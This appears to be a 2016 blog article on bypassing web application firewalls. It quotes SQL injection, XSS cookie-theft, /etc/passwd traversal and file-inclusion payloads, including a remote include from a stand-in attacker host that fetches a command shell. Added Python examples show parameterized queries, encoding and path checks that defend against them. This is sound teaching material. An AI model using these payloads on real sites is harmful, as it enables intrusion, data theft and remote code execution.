Part 1: Bypass a Web Application Firewall (WAF)

By: S-Connect
July 22, 2016
Methods to Reduce the Threats

Directive Approach
  • Software Development Life Cycle (SDLC); «paper security»; organization of high-level processes

Detective Approach
  • Black/white-box testing of functions; fuzzing; static/dynamic/manual analysis of program code

Preventive Approach
  • Intrusion Detection/Prevention Systems (IDS/IPS), Web Application Firewall (WAF)

What is WAF?

Methods to Bypass WAF
  1. SQL Injection

There are two types of SQL Injection:

  • SQL Injection into a string parameter. Example: SELECT * from table where name = 'Name'
  • SQL Injection into a numeric parameter. Example: SELECT * from table where id = 123

Exploitation of SQL Injection vulnerabilities is divided into classes according to the DBMS type and the injection conditions.

  • The vulnerable query may be an INSERT, UPDATE, DELETE, etc., not only a SELECT

Example: UPDATE users SET pass = '1' where user = 't1' OR 1=1--'

  • Blind SQL Injection

Example: select * from table where id = 1 AND if((ascii(lower(substring((select user()),$i,1))))!=$s,1,benchmark(2000000,md5(now())))

  • Exploitation features for various DBMSs

Example: (MySQL): SELECT * from table where id = 1 union select 1,2,3

Example: (PostgreSQL): SELECT * from table where id = 1; select 1,2,3
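The string, numeric and UPDATE cases above, with the article's own payloads run against a vulnerable concatenating query and against its parameterized replacement. This is an added example, not code from the article: the in-memory SQLite table, the column names and the function names are constructed for the demonstration. The point it shows is that the same input that rewrites the query under concatenation is inert once it travels as a bound parameter, and that a numeric parameter needs type validation because no quote is required to inject into it.

```python
import sqlite3


def make_db():
    """Constructed sample data (not from the article): an in-memory users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, pass TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "t1", "secret1"), (2, "t2", "secret2"), (3, "admin", "secret3")],
    )
    conn.commit()
    return conn


# --- injection into a string parameter ---------------------------------------

def lookup_by_name_vulnerable(conn, name):
    # Concatenation: a quote in `name` closes the literal and the rest is parsed as SQL.
    sql = "SELECT id, name FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_by_name_safe(conn, name):
    # Bound parameter: the value is sent outside the SQL text and is never parsed as SQL.
    return conn.execute("SELECT id, name FROM users WHERE name = ?", (name,)).fetchall()


# --- injection into a numeric parameter (no quote needed) --------------------

def lookup_by_id_vulnerable(conn, id_value):
    # "1 union select 1,2" simply continues the statement.
    sql = "SELECT id, name FROM users WHERE id = " + id_value
    return conn.execute(sql).fetchall()


def lookup_by_id_safe(conn, id_value):
    # Validate the type first: a numeric column only ever receives an integer.
    if not id_value.isdigit():
        return None  # reject; do not try to "clean" the string
    return conn.execute(
        "SELECT id, name FROM users WHERE id = ?", (int(id_value),)
    ).fetchall()


# --- injection into UPDATE (the article's "t1' OR 1=1--" case) --------------

def set_password_vulnerable(conn, user, new_pass):
    # With user = "t1' OR 1=1--" the WHERE clause matches every row.
    sql = "UPDATE users SET pass = '" + new_pass + "' WHERE name = '" + user + "'"
    return conn.execute(sql).rowcount  # rows actually changed


def set_password_safe(conn, user, new_pass):
    return conn.execute(
        "UPDATE users SET pass = ? WHERE name = ?", (new_pass, user)
    ).rowcount


if __name__ == "__main__":
    db = make_db()
    print(lookup_by_name_vulnerable(db, "x' OR 1=1--"))  # every row
    print(lookup_by_name_safe(db, "x' OR 1=1--"))        # no row
    print(set_password_safe(db, "t1' OR 1=1--", "1"))    # 0 rows changed
    print(set_password_vulnerable(db, "t1' OR 1=1--", "1"))  # 3 rows changed
```

The rowcount returned by the UPDATE functions is the useful defender's signal here: a password change that touches more than one row is an event worth logging and alerting on even when a WAF sits in front of the application.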

  2. Cross-Site Scripting (XSS)

There are two types of Cross-Site Scripting (XSS):

  • Persistent/stored
  • Non-persistent/reflected

Cross-Site Scripting vulnerabilities typically occur in:

  • HTML tags
  • The body of JavaScript/VBScript/etc. (e.g. DOM-based)
  • HTML code
  • HTML tag parameters
  • Java
  • Flash

Cross-Site Scripting is a client-side vulnerability, so some protections live in the browser:

  • Microsoft Internet Explorer 8 XSS filter
  • Mozilla NoScript Firefox extension

General Issues:

  • Stored XSS

If an attacker manages to push a stored XSS payload through the filter once, the WAF cannot prevent the attack afterwards, because the payload is served from the application's own storage rather than from a request the WAF inspects.

  • Reflected XSS in Java Script

Example: <script> … setTimeout("writetitle()",$_GET[xss]) … </script>

Exploitation: /?xss=500); alert(document.cookie);//

  • DOM-based XSS

Example: <script> … eval($_GET[xss]); … </script>

Exploitation: /?xss=document.cookie
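The two exploitation strings above, used as test input for an added example (not code from the article) of how the server side should handle the value instead. The rendering functions, the `writetitle()` timer and the signature list are constructed for the demonstration. It shows three things: HTML entity encoding does not help when the value lands inside JavaScript, because the payload contains none of the characters it encodes; a value that must be a number should be validated as one; and a value that must become a JavaScript string should be emitted as a string literal (data) rather than passed to `eval` (code). The last function is a toy signature check that illustrates why a WAF has nothing to match in the DOM-based case.

```python
import html
import json

# The article's two exploitation strings, reused here as test input.
JS_CONTEXT_PAYLOAD = "500); alert(document.cookie);//"
DOM_PAYLOAD = "document.cookie"


def render_delay_vulnerable(delay):
    # Mirrors setTimeout("writetitle()",$_GET[xss]): raw input inside JavaScript.
    return '<script>setTimeout("writetitle()",' + delay + ');</script>'


def render_delay_html_escaped(delay):
    # Common mistake: entity encoding protects an HTML text context only.
    # None of the payload's characters are touched, so the script still runs.
    return '<script>setTimeout("writetitle()",' + html.escape(delay) + ');</script>'


def render_delay_safe(delay, default=500, maximum=60000):
    # The value is a number, so enforce the type; anything else gets the default.
    # (default and maximum are assumptions for the demonstration.)
    if delay.isdigit() and int(delay) <= maximum:
        value = int(delay)
    else:
        value = default
    return '<script>setTimeout("writetitle()",' + str(value) + ');</script>'


def js_string_literal(value):
    # Encode untrusted text as a JavaScript string literal. json.dumps escapes
    # quotes and backslashes; the extra escapes keep "</script>" from closing
    # the script block and "&" from being reinterpreted by an HTML parser.
    return (
        json.dumps(value)
        .replace("<", "\\u003c")
        .replace(">", "\\u003e")
        .replace("&", "\\u0026")
    )


def render_title_safe(title):
    # Replacement for eval($_GET[xss]): the input is data assigned to a
    # variable and never executed as code.
    return "<script>var t = " + js_string_literal(title) + "; document.title = t;</script>"


def naive_waf_flags(value):
    # A signature list of the kind a request filter might use. It fires on the
    # JS-context payload but has nothing to match in "document.cookie".
    signatures = ("<script", "alert(", "onerror=", "javascript:")
    low = value.lower()
    return any(sig in low for sig in signatures)


if __name__ == "__main__":
    print(render_delay_vulnerable(JS_CONTEXT_PAYLOAD))   # alert() reaches the browser
    print(render_delay_html_escaped(JS_CONTEXT_PAYLOAD)) # identical: escaping did nothing
    print(render_delay_safe(JS_CONTEXT_PAYLOAD))         # falls back to 500
    print(render_title_safe(DOM_PAYLOAD))                # a string literal, not code
    print(naive_waf_flags(DOM_PAYLOAD))                  # False: nothing to match
```

The design choice worth noting is that the fix is chosen by output context, not by input filtering: a numeric slot gets a number, a string slot gets a string literal, and no slot gets raw input or `eval`.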

Similar problems take place in the filters that protect systems from XSS at the client-side level (e.g., IE8).

A Cross-Site Scripting attack can successfully bypass the WAF and be conducted in all following cases:

  • Exploitation of DOM-based XSS
  • Using HPP (HTTP Parameter Pollution) and HPF (HTTP Parameter Fragmentation) techniques
  • As with SQL Injection, bypassing filter rules (signatures) and abusing weaknesses in the WAF's request normalization functions

  3. Path Traversal, Local/Remote File Inclusion

An example of Path Traversal Vulnerability:

  • Program logics:

<? include($_GET['file'].".txt") ;?>

index.php?file=myfile

  • Exploitation example: index.php?file=/../../../../../etc/passwd%00

Risks represented by Local File Inclusion vulnerabilities:

  • The functions include() and require() treat the file's text as part of the program code!
  • Exploitation example: index.php?file=img/command_shell.jpg%00

Appearance of Remote File Inclusion:

  • If allow_url_fopen and allow_url_include are enabled, then:

index.php?file=https://hacker.host/command_shell

An example of Path Traversal vulnerability:

  • Program logics:

<? include("./files/".$_GET['file']) ;?>

  • Vulnerability exploitation: /?id=/union%20select/../../../../../../../etc/passwd

The request becomes: <? include("./files//uniX on%20sel X ect/../../../../../../../etc/passwd") ;?>
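The path traversal, NUL-truncation, remote include and signature-stripping cases above, checked with one containment routine. This is an added example, not code from the article: the document root `/var/www/files`, the request strings (modelled on the article's payloads) and the function names are constructed for the demonstration. `waf_forwarded_path` models the final example, where a filter that only removes the `union select` signature forwards a path that still climbs out of `./files/`; `resolve_safe` shows the check a defender wants instead, made on the canonical path rather than on the raw request string.

```python
import posixpath
import urllib.parse

# Assumption: the application's intended document root (not from the article).
BASE = "/var/www/files"

# Constructed request values modelled on the article's examples.
TRAVERSAL_NUL = "/../../../../../etc/passwd%00"
LFI_NUL = "img/command_shell.jpg%00"
RFI_URL = "https://hacker.host/command_shell"
SIGNATURE_DODGE = "/union%20select/" + "../" * 7 + "etc/passwd"


def strip_signature(decoded):
    # Models the normalisation the article describes: a filter that removes a
    # known SQL injection signature and forwards whatever is left.
    return decoded.replace("union select", "")


def waf_forwarded_path(param):
    # What include("./files/".$_GET['file']) receives after a signature-only filter.
    decoded = urllib.parse.unquote(param)
    return posixpath.normpath("./files/" + strip_signature(decoded))


def resolve_safe(param):
    """Return the canonical path if it stays under BASE, otherwise None."""
    decoded = urllib.parse.unquote(param)
    if "\x00" in decoded:        # NUL truncation ("command_shell.jpg%00")
        return None
    if "://" in decoded:         # remote include via allow_url_include
        return None
    candidate = posixpath.normpath(posixpath.join(BASE, decoded))
    # Containment is decided on the canonical path, so it does not matter
    # which characters a request filter did or did not remove upstream.
    if posixpath.commonpath([BASE, candidate]) != BASE:
        return None
    return candidate


if __name__ == "__main__":
    print(resolve_safe("report.txt"))           # /var/www/files/report.txt
    print(resolve_safe(TRAVERSAL_NUL))          # None
    print(resolve_safe(SIGNATURE_DODGE))        # None
    print(waf_forwarded_path(SIGNATURE_DODGE))  # ../../../../../../etc/passwd
```

Note that `resolve_safe` decodes the parameter exactly once before checking it; a filter that normalizes and a check that decodes again are the kind of mismatch the article's last bullet refers to, and an allowlist of permitted file names under `BASE` is a stronger control still.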

Stay Linked!! Ali Tabish